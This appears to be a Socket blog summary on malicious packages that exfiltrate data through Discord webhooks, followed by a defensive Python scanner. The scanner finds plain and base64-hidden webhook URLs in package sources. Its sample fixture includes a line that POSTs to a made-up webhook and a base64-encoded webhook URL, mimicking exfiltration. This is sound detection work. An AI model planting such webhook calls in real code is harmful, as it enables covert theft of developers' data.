Weaponizing Discord for Command and Control Across npm, PyPI, and RubyGems.org
Blog post from Socket
Socket's Threat Research Team has observed a trend in which malicious packages use Discord webhooks as command and control (C2) channels for data exfiltration, a tactic that removes the attacker's need to maintain their own infrastructure. Unlike traditional C2 servers, these webhooks require no authentication beyond the URL itself and operate over HTTPS, so their traffic can easily slip past security measures. Examples include npm, PyPI, and RubyGems.org packages that transmit sensitive data such as configuration files and system information to Discord webhooks, highlighting a supply chain risk. Embedded within packages like mysql-dumpdiscord and sqlcommenter_rails, these webhooks function as exfiltration points while blending in with regular code, which makes them difficult to detect through traditional domain or signature blocking.

Socket's security tools aim to identify these patterns by analyzing pull requests for risks like hard-coded webhook URLs and enforcing checks during package installation. This development emphasizes the importance of treating webhook endpoints as potential data-loss channels and implementing robust controls to monitor and restrict outbound data flows.
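To make the "hard-coded webhook URL" check concrete, here is an added example scanner; it is not Socket's code and not taken from any of the packages named above. It walks a package's source files and flags Discord webhook URLs that appear either in plain text or hidden inside a base64 literal, reporting only the numeric webhook id so the secret token never lands in a report. The sample package contents, the webhook id and the token are constructed for this example.

```python
"""Flag hard-coded Discord webhook URLs (plain or base64-encoded) in package sources."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Discord webhook URL shapes: discord.com or discordapp.com, optional canary./ptb. subdomain,
# then /api/webhooks/<numeric id>/<token>.
WEBHOOK_RE = re.compile(
    r"https?://(?:(?:canary|ptb)\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_\-]+)"
)
# Candidate base64 literals long enough to hold a webhook URL.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    webhook_id: str   # numeric webhook id only; the secret token is deliberately not kept
    encoded: bool     # True when the URL was hidden inside a base64 literal


def _decode_candidate(blob: str) -> Optional[str]:
    """Strictly decode a base64 candidate to text; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueError subclasses
        return None


def scan_text(path: str, text: str) -> List[Finding]:
    """Scan one file's text line by line for plain and base64-hidden webhook URLs."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in WEBHOOK_RE.finditer(line):
            findings.append(Finding(path, lineno, m.group(1), False))
        for cand in B64_RE.finditer(line):
            decoded = _decode_candidate(cand.group(0))
            if decoded is None:
                continue
            for m in WEBHOOK_RE.finditer(decoded):
                findings.append(Finding(path, lineno, m.group(1), True))
    return findings


def scan_package(files: Dict[str, str]) -> List[Finding]:
    """files maps a relative path inside the package to its source text."""
    out: List[Finding] = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


def report(findings: List[Finding]) -> List[str]:
    """Human-readable lines with the token redacted (only the id is shown)."""
    return [
        f"{f.path}:{f.line}: discord webhook id={f.webhook_id}"
        + (" (base64-encoded)" if f.encoded else "")
        for f in findings
    ]


# Constructed sample package (hypothetical files; id and token are made up).
_FAKE_URL = "https://discord.com/api/webhooks/123456789012345678/constructed-token-AbC"
SAMPLE_PACKAGE = {
    "lib/report.js": 'const hook = "' + _FAKE_URL + '";\nfetch(hook, {method: "POST"});\n',
    "pkg/setup_hook.py": "import base64\nU = base64.b64decode('"
    + base64.b64encode(_FAKE_URL.encode()).decode()
    + "').decode()\n",
    "lib/clean.rb": "puts 'hello'\n",
}

if __name__ == "__main__":
    for line in report(scan_package(SAMPLE_PACKAGE)):
        print(line)
```

In a CI or pre-install hook, the same `scan_package` call can be fed the unpacked tarball of a dependency; any finding is a reason to block the install and review the package, since a legitimate library has little reason to ship a webhook URL in its source.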